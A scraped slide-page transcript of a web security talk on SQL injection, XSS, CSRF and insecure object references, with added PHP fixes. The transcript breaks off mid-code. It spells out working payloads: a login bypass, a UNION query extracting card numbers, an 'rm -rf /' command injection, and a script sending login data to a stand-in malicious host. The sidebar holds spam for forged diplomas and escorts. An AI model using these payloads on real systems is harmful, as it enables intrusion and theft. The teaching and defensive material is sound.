一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理F
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiMonica Sydney
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理F
 
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理AS
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制pxcywzqs
 
PIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsxPIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsxjeykeydeveloper
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理F
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoilmeghakumariji156
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.krishnachandrapal52
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查ydyuyu
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...gajnagarg
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge GraphsEleniIlkou
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrHenryBriggs2
 

Dernier (20)

一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
 
一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理
 
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
 
PIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsxPIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsx
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 

Hacking Your Way To Better Security

  • 1. Hacking Your Way To Better Security
  • 2. Colin O’Dell, @colinodell
        Lead Web Developer at Unleashed Technologies
        PHP developer since 2002
        league/commonmark maintainer
        PHP 7 Upgrade Guide e-book author
        php[world] 2015 CtF winner
  • 3. Goals
        Explore several top security vulnerabilities from the perspective of an attacker.
        1. Understand how to detect and exploit common vulnerabilities
        2. Learn how to protect against those vulnerabilities
  • 4. Disclaimers
        1. NEVER test systems that aren’t yours without explicit permission.
        2. Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
  • 6. OWASP Top 10
        Regular publication by The Open Web Application Security Project.
        Highlights the 10 most-critical web application security risks.
  • 9. SQL Injection
        Modifying SQL statements to:
        • Spoof identity
        • Tamper with data
        • Disclose hidden information
  • 10. SQL Injection Basics
        $value = $_REQUEST['value'];
        $sql = "SELECT * FROM x WHERE y = '$value' ";
        $database->query($sql);
        Whatever the request supplies is pasted inside the quotes unchanged, so the statement the database sees is:
        SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]'
  • 12. Login form after the first attempt (admin / password): "Invalid username or password. Please try again."
        Next attempt: Username admin, Password password' (with a trailing single quote).
  • 14. Result: "Unknown error." The server logs explain why:
        $ tail -n 1 /var/log/apache2/error.log
        MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1.
        $ tail -n 1 /var/log/mysql/query.log
        SELECT * FROM users WHERE username = 'admin' AND password = 'password'';
  • 15. Same logs, with the extra quote at the end of 'password'' highlighted: the quote typed into the form leaves an unterminated string literal behind.
  • 18. Next attempt: Password ' test
        $ tail -n 1 /var/log/apache2/error.log
        MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1.
        $ tail -n 1 /var/log/mysql/query.log
        SELECT * FROM users WHERE username = 'admin' AND password = '' test';
  • 19. Same logs, with the injected fragment ' test highlighted inside the query.
  • 20. Working from the injected query toward the one the attacker actually wants:
        SELECT * FROM users WHERE username = 'admin' AND password = '' test';
        SELECT * FROM users WHERE username = 'admin' AND password = '';
        SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true);
        SELECT * FROM users WHERE username = 'admin' AND (true);
        SELECT * FROM users WHERE username = 'admin';
  • 21. Input: ' test
        Query: SELECT * FROM users WHERE username = 'admin' AND password = '' test ';
  • 22. Same query, with the part that came from the input highlighted.
  • 23. The input always lands between two quotes that the application itself supplies:
        SELECT * FROM users WHERE username = 'admin' AND password = ' ';
  • 24. Input: '
        Query: SELECT * FROM users WHERE username = 'admin' AND password = '' ';
  • 25. Input: ' '
        Query: SELECT * FROM users WHERE username = 'admin' AND password = '' ' ';
  • 26. Input: ' OR '
        Query: SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' ';
  • 27. Input: ' OR '1'='1
        Query: SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';
  • 29. Welcome Admin!
        Admin Menu: Give customer money / Take money away / Review credit card applications / Close accounts
  • 31. Blind SQL Injection: what each response tells the attacker
        "Invalid username or password. Please try again." = valid query, empty result
        "Unknown error." = invalid query
        "Welcome Admin!" = valid query with a result
  • 32. Login form. Username: admin. Password: ' AND (SELECT id FROM user LIMIT 1) = '
  • 33. Result: "Unknown error."
        Query: SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
  • 34. Error log: MySQL error: Unknown table 'user'. (The user only sees "Unknown error.")
  • 35. Retry with the table name changed: Password: ' AND (SELECT id FROM users LIMIT 1) = '
        (The error panel on the slide still shows the previous attempt's "Unknown table 'user'" message.)
  • 36. Result: "Invalid username or password. Please try again." Per slide 31 that means the query was valid, so a table named users exists.
  • 38. SQL Injection - Data Disclosure
        http://www.onlinebookstore.com/books/123
        $id = …;
        $sql = "SELECT title, author, price FROM books WHERE id = " . $id;
        $data = $database->query($sql);
        Query: SELECT * FROM books WHERE id = 123
        Result: { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 }
  • 39. http://www.onlinebookstore.com/books/99999
        Query: SELECT * FROM books WHERE id = 99999
        Result: { } (no such book)
  • 40. http://www.onlinebookstore.com/books/?????
        Query: SELECT * FROM books WHERE id = ?????
        Result: { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 41. SQL UNION Query: UNION appends the rows of a second SELECT that has the same number of columns.
        Column 1 | Column 2 | Column 3
        The Great Gatsby | F. Scott Fitzgerald | 9.75
        UNION
        Column 1 | Column 2 | Column 3
        Foo | Bar | 123
        gives
        Column 1 | Column 2 | Column 3
        The Great Gatsby | F. Scott Fitzgerald | 9.75
        Foo | Bar | 123
  • 42. The second SELECT can be any query, with constants padding out the remaining columns:
        The Great Gatsby | F. Scott Fitzgerald | 9.75
        UNION
        (SELECT) | 1 | 1
        gives both rows: The Great Gatsby | F. Scott Fitzgerald | 9.75 and (SELECT) | 1 | 1
  • 43. If the first SELECT matches nothing (empty), the result is only the UNIONed row: (SELECT) | 1 | 1
  • 44. http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards
        Same PHP as slide 38. A one-column SELECT cannot be UNIONed with a three-column one, so the columns have to be padded, as on the next slide.
  • 45. http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards
  • 46. Query: SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards
  • 47. Result: { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 }
        The credit card number comes back in the title column of the book page.
  • 48. Protecting Against SQL Injection
        The vulnerable pattern again:
        $val = $_REQUEST['value'];
        $sql = "SELECT * FROM x WHERE y = '$val' ";
        $database->query($sql);
        Option 1: Block input with special characters
  • 49. Option 2: Escape user input
        $value = $_REQUEST['value'];
        $escaped = mysqli_real_escape_string($mysqli, $value); // the connection is the first argument
        $sql = "SELECT * FROM x WHERE y = '$escaped' ";
        $database->query($sql);
        mysqli_real_escape_string() backslash-escapes the quotes, so ' OR '1' = '1 becomes \' OR \'1\' = \'1 and no longer terminates the literal, unlike the unescaped query SELECT * FROM x WHERE y = '' OR '1' = '1'.
  • 51. Option 3: Use prepared statements
        $mysqli = new mysqli("localhost", "user", "pass", "db");
        $q = $mysqli->prepare("SELECT * FROM x WHERE y = ?"); // the placeholder is not quoted
        $value = $_REQUEST['value'];
        $q->bind_param("s", $value);                           // "s": bind as a string
        $q->execute();
        Native PHP: mysqli, pdo_mysql. Frameworks / libraries: Doctrine, Eloquent, Zend_Db.
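The login query from slides 20 through 27, built both ways so the difference is visible, as an added example that is not part of the slide deck. It swaps the talk's mysqli for PDO with an in-memory SQLite database so it runs offline with php-cli (the pdo_sqlite extension is assumed to be available, as it is in most PHP builds); the table, the sample row and the function names are constructed for the demo.

```php
<?php
// Added example (not from the slides): the talk's login query built with
// string interpolation and with a prepared statement, run against an
// in-memory SQLite database so the two behaviours can be compared offline.
declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    // Constructed sample row. A real application stores a password hash, never the plaintext.
    $db->exec("INSERT INTO users (username, password) VALUES ('admin', 's3cret')");
    return $db;
}

// Vulnerable: the slide's interpolation. Quotes in the input become SQL syntax.
function loginVulnerable(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened: a prepared statement. The "?" markers are not quoted; the driver
// sends the values separately from the SQL text, so a quote in the input is
// just a character inside a string and can never end the literal.
function loginPrepared(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT * FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$username, $password]);
    return $stmt->fetch() !== false;
}

$db = makeDb();
$payload = "' OR '1'='1";   // the input from slide 27

var_dump(loginVulnerable($db, 'admin', 's3cret'));   // correct credentials
var_dump(loginVulnerable($db, 'admin', $payload));   // the bypass from the talk
var_dump(loginPrepared($db, 'admin', 's3cret'));     // correct credentials
var_dump(loginPrepared($db, 'admin', $payload));     // the same payload, now an ordinary string
```

Running it shows the interpolated version logging the attacker in with the payload while the prepared version rejects it; the WHERE clause sent by the prepared statement is identical for both calls, only the bound values differ. The same pattern applies to mysqli, as on slide 51: an unquoted `?` plus `bind_param()`.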
  • 52. Other Types of Injection
        NoSQL databases, OS commands, LDAP queries, SMTP headers
        OS command example:
        $file = $_GET['filename'];
        shell_exec("rm uploads/{$file}");
        Request: /rm.php?filename=foo.jpg+%26%26+rm+-rf+%2F
        Command actually run: rm uploads/foo.jpg && rm -rf /
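The rm.php case from slide 52 with a hardened counterpart, as an added example that is not part of the slide deck. The fix avoids the shell entirely: it allow-lists the file name, resolves it under the uploads directory and confirms it stayed there before calling `unlink()`. The uploads directory, the function names and the demo files are constructed; the unsafe version only returns the command string it would have run, so nothing dangerous executes.

```php
<?php
// Added example (not from the slides): the talk's file-deletion endpoint,
// first as shown on the slide (unsafe) and then without any shell involved.
declare(strict_types=1);

// Unsafe: the file name is interpolated into a shell command line, so shell
// metacharacters in the request (&&, ;, |, $(...)) become extra commands.
// Returned instead of executed so this example runs harmlessly.
function removeUploadUnsafe(string $file): string
{
    return "rm uploads/{$file}";
}

// Hardened: no shell at all. Accept only a bare file name, resolve it inside
// the uploads directory, check it is still inside (this also catches symlinks
// pointing elsewhere) and only then delete it with unlink().
function removeUploadSafe(string $uploadsDir, string $file): bool
{
    // 1. Conservative allow-list: letters, digits, dot, dash, underscore.
    //    "/" and ".." cannot pass, and "." / ".." are rejected explicitly.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,100}\z/', $file) || $file === '.' || $file === '..') {
        return false;
    }
    // 2. Resolve both paths and confirm the target lives under the base.
    $base   = realpath($uploadsDir);
    $target = realpath($uploadsDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $target === false
        || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
        return false;
    }
    return is_file($target) && unlink($target);
}

// Demo in a throwaway directory (constructed; nothing outside it is touched).
$dir = sys_get_temp_dir() . '/uploads_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
touch("$dir/foo.jpg");

$hostile = 'foo.jpg && rm -rf /';   // the decoded query string from slide 52
echo removeUploadUnsafe($hostile), PHP_EOL;             // the command the slide's code would run
var_dump(removeUploadSafe($dir, $hostile));             // rejected by the allow-list
var_dump(removeUploadSafe($dir, '../../etc/passwd'));   // rejected: contains "/"
var_dump(removeUploadSafe($dir, 'missing.jpg'));        // rejected: realpath() fails
var_dump(removeUploadSafe($dir, 'foo.jpg'));            // the legitimate file is removed

rmdir($dir);
```

If a shell really is unavoidable, `escapeshellarg()` on each argument is the minimum, but a filesystem call that takes a path as data rather than as part of a command line removes the whole class of problem, which is the same shift prepared statements make for SQL.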
  • 53. XSS: Cross-Site Scripting
        Injecting code into the webpage (for other users)
        • Execute malicious scripts
        • Hijack sessions
        • Install malware
        • Deface websites
  • 54. XSS Attack Basics: raw code/script is injected onto a page. Any of these sources can carry it, not just form input:
        $value = $_POST['value'];
        $value = $rssFeed->first->title;
        $value = db_fetch('SELECT x FROM table');
        <?php echo $value ?>
  • 55. XSS – Cross-Site Scripting Basics (diagram). The payload used in the diagram:
        <form id="evilform" action="https://facebook.com/password.php" method="post">
          <input type="password" value="hacked123">
        </form>
        <script> document.getElementById('evilform').submit(); </script>
        Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png. Logos are copyright of their respective owners.
  • 56. short.ly demo: a URL shortener with a "Paste a URL here" box and a Shorten button.
  • 57. Input: http://www.colinodell.com → Shorten
  • 58. Short URL: http://short.ly/b7fe9 / Original URL: http://www.colinodell.com
  • 59. Visiting the short URL: "Please wait while we redirect you to http://www.colinodell.com"
  • 60. Input: <script>alert('hello world!');</script> → Shorten
  • 61. Short URL: http://short.ly/3bs8a / Original URL: an alert box pops up ("hello world!", OK) instead of the text.
  • 62. After dismissing the alert the Original URL is blank: the script ran rather than being displayed.
  • 63. The HTML the page rendered:
        <p> Short URL: <a href="…">http://short.ly/3bs8a</a> </p>
        <p> Original URL: <a href="…"><script>alert('hello world!');</script></a> </p>
  • 64. Input: <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> → Shorten
  • 65. Short URL: http://short.ly/3bs8a / Original URL: blank again; the iframe tag was rendered as markup instead of shown as text.
  • 66. The redirect page ("Please wait while we redirect you to") renders the injected markup for every visitor of the short link.
  • 67. A more dangerous payload, changing where the site's own login form posts:
        document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php';
  • 68. Protecting Against XSS Attacks: the unprotected pattern
        $value = $_POST['value'];
        $value = db_fetch('SELECT value FROM table');
        $value = $rssFeed->first->title;
        <?php echo $value ?>
  • 69. • Filter user input
        $value = strip_tags($_POST['value']);
        $value = strip_tags( db_fetch('SELECT value FROM table') );
        $value = strip_tags($rssFeed->first->title);
        <?php echo $value ?>
  • 70. • Escape user input
        $value = htmlspecialchars($_POST['value']);
        $value = htmlspecialchars( db_fetch('SELECT value FROM table') );
        $value = htmlspecialchars($rssFeed->first->title);
        <?php echo $value ?>
        htmlspecialchars() turns <script> into &lt;script&gt;, which the browser displays as text.
  • 71. • Escape output: escape once, at the point where the value is rendered, whatever its source
        $value = $_POST['value'];
        $value = db_fetch('SELECT value FROM table');
        $value = $rssFeed->first->title;
        <?php echo htmlspecialchars($value) ?>
  • 72. Twig-style template engines escape output by default: {{ some_variable }} is escaped, {{ some_variable|raw }} opts out.
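The "escape output" rule applied to the short.ly result page from slides 58 through 63, as an added example that is not part of the slide deck. Escaping alone is not enough for a value that goes into an `href`, so the example also checks the URL's scheme before turning it into a link. The helper names, the short codes and the inputs are constructed.

```php
<?php
// Added example (not from the slides): rendering short.ly's result page with
// output escaping, plus a scheme check for the user-supplied link target.
declare(strict_types=1);

// Escape for an HTML text node or a double-quoted attribute value.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE keeps invalid UTF-8
// from making htmlspecialchars() return an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// A user-supplied URL placed in href= needs more than escaping: escaping stops
// the attribute from being broken out of, but not a javascript: or data: link.
// Only http(s) URLs with a host are accepted as link targets.
function safeHref(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

// Builds the two <p> elements from slide 63, escaping at the output boundary.
function renderResult(string $shortCode, string $originalUrl): string
{
    $short = 'http://short.ly/' . $shortCode;
    $html  = '<p>Short URL: <a href="' . e($short) . '">' . e($short) . '</a></p>' . PHP_EOL;

    $href = safeHref($originalUrl);
    if ($href === null) {
        // Not a usable link: show the submitted value as escaped text only.
        $html .= '<p>Original URL: ' . e($originalUrl) . ' (not a valid http/https URL)</p>';
    } else {
        $html .= '<p>Original URL: <a href="' . e($href) . '">' . e($href) . '</a></p>';
    }
    return $html;
}

// Constructed inputs: the talk's benign URL, its script payload, and a
// well-formed URL whose scheme must not become a clickable link.
echo renderResult('b7fe9', 'http://www.colinodell.com'), PHP_EOL, PHP_EOL;
echo renderResult('3bs8a', "<script>alert('hello world!');</script>"), PHP_EOL, PHP_EOL;
echo renderResult('c0ffe', "javascript:alert(document.cookie)"), PHP_EOL;
```

The second call prints the `<script>` tag with its angle brackets and quotes converted to entities, so the browser shows the text and runs nothing; the third is refused as a link target even though it contains no characters that escaping would touch. That second point is why escaping is per context: HTML body, attribute, URL and JavaScript each need their own rule.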
  • 73. CSRF: Cross-Site Request Forgery
        Execute unwanted actions on another site which the user is logged in to.
        • Change password
        • Transfer funds
        • Anything the user can do
  • 74. (diagram) User to Facebook: "Hi Facebook! I am colinodell and my password is *****." Facebook: "Welcome Colin! Here’s your news feed."
  • 75. (diagram) User to other website: "Hi other website! Show me your homepage." Other website: "Sure, here you go!" and the page it serves contains:
        <form id="evilform" action="https://facebook.com/password.php" method="post">
          <input type="password" value="hacked123">
        </form>
        <script> document.getElementById('evilform').submit(); </script>
  • 76. The forged form, shown on its own.
  • 77. What the script does: tell Facebook we want to change our password to hacked123.
  • 78. The browser, carrying the user's Facebook session, sends "Hi Facebook! Please change my password to hacked123." Facebook: "Done!"
  • 79. short.ly demo. Input: <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> → Shorten
  • 80. Redirect page: "Please wait while we redirect you to" followed by a broken-image icon (X); every visitor's browser has requested that PayPal URL with the visitor's own session.
  • 81. Protecting Against CSRF Attacks: use randomized CSRF tokens
        <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf">
        1. Generate a random string per user.
        2. Store it in their session.
        3. Add it to the form as a hidden field.
        4. Compare the submitted value to the session:
           1. Same token? Proceed.
           2. Different/missing? Reject the request.
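The four steps of slide 81 written out in PHP, as an added example that is not part of the slide deck. The session is passed in as an array so the script runs from the command line; in a web application the same functions would take `$_SESSION` after `session_start()`. The function names, the field name `token` and the sample submissions are constructed.

```php
<?php
// Added example (not from the slides): per-user CSRF token generation,
// storage, emission as a hidden field and constant-time verification.
declare(strict_types=1);

// Steps 1 and 2: generate a random token for this user and keep it in the session.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));   // 64 hex chars from the CSPRNG
    }
    return $session['csrf_token'];
}

// Step 3: the hidden field for the form. Escaped out of habit even though the
// token is hex only; the attribute context is the same as any other output.
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="token" value="' . $token . '">';
}

// Step 4: compare the submitted value with the session copy. hash_equals()
// runs in constant time, so a wrong guess cannot be narrowed down byte by byte.
function csrfValid(array $session, array $post): bool
{
    if (!isset($session['csrf_token'])
        || !isset($post['token']) || !is_string($post['token'])) {
        return false;   // missing token: reject
    }
    return hash_equals($session['csrf_token'], $post['token']);
}

// Constructed walk-through: a real submission versus two forged ones.
$session = [];
echo csrfField($session), PHP_EOL;

$legitPost  = ['token' => $session['csrf_token'], 'new_password' => 'correct horse'];
$forgedPost = ['new_password' => 'hacked123'];                     // slide 76: no token at all
$guessPost  = ['token' => str_repeat('0', 64), 'new_password' => 'hacked123'];

var_dump(csrfValid($session, $legitPost));    // accepted: same token
var_dump(csrfValid($session, $forgedPost));   // rejected: token missing
var_dump(csrfValid($session, $guessPost));    // rejected: token differs
```

The forged form on slide 76 fails because the attacker's page cannot read the victim's session and so cannot fill in the field; the browser still attaches the victim's cookies, which is exactly why the cookie alone must not be enough to authorize a state-changing request.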
  • 82. Insecure Direct Object References
        Access & manipulate objects you shouldn’t have access to
  • 84. Insecure Direct Object References (demo screenshot: a customer record, "Beverly Coop")
  • 89. Protecting Against Insecure Direct Object References: check permission on data input
        • URL / route parameters
        • Form field inputs
        • Basically anything that’s an ID
        • If they don’t have permission, show a 403 (or 404) page
  • 90. Check permission on data output as well
        • Do they have permission to access this object?
        • Do they have permission to even know this exists?
        • This is not “security through obscurity”
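The input and output checks from slides 89 and 90 in one request handler, as an added example that is not part of the slide deck. The data store, the users, the route `/accounts/{id}` and the exception classes are all constructed for the demo.

```php
<?php
// Added example (not from the slides): an object lookup keyed by an ID from
// the route, with the permission check done before the record is returned.
declare(strict_types=1);

// Constructed data: two customers' accounts, each with an owner.
const ACCOUNTS = [
    101 => ['owner_id' => 1, 'balance' => 250.00],
    102 => ['owner_id' => 2, 'balance' => 9000.00],
];

final class NotFound  extends RuntimeException {}   // maps to a 404 response
final class Forbidden extends RuntimeException {}   // maps to a 403 response

// Authorization rule: the owner or an admin may view an account.
function canView(array $user, array $account): bool
{
    return $user['is_admin'] || $account['owner_id'] === $user['id'];
}

// GET /accounts/{id}. The ID is untrusted input: validate its shape on the
// way in, then check the caller's permission on the record on the way out.
function showAccount(array $user, string $rawId, bool $hideExistence = false): array
{
    if (!ctype_digit($rawId)) {
        throw new NotFound('no such account');
    }
    $account = ACCOUNTS[(int) $rawId] ?? null;
    if ($account === null) {
        throw new NotFound('no such account');
    }
    if (!canView($user, $account)) {
        // Slide 90's second question: if the caller should not even learn that
        // this ID exists, answer exactly as for a missing record.
        throw $hideExistence ? new NotFound('no such account') : new Forbidden('not your account');
    }
    return $account;
}

$alice = ['id' => 1,  'is_admin' => false];
$admin = ['id' => 99, 'is_admin' => true];

$requests = [
    [$alice, '101'],          // her own account
    [$alice, '102'],          // someone else's: the classic IDOR attempt
    [$admin, '102'],          // admin may view any account
    [$alice, '999'],          // does not exist
    [$alice, '102 OR 1=1'],   // not an integer at all
];

foreach ($requests as [$user, $id]) {
    try {
        $acct = showAccount($user, $id);
        printf("user %d -> /accounts/%s: 200, balance %.2f\n", $user['id'], $id, $acct['balance']);
    } catch (Forbidden $e) {
        printf("user %d -> /accounts/%s: 403\n", $user['id'], $id);
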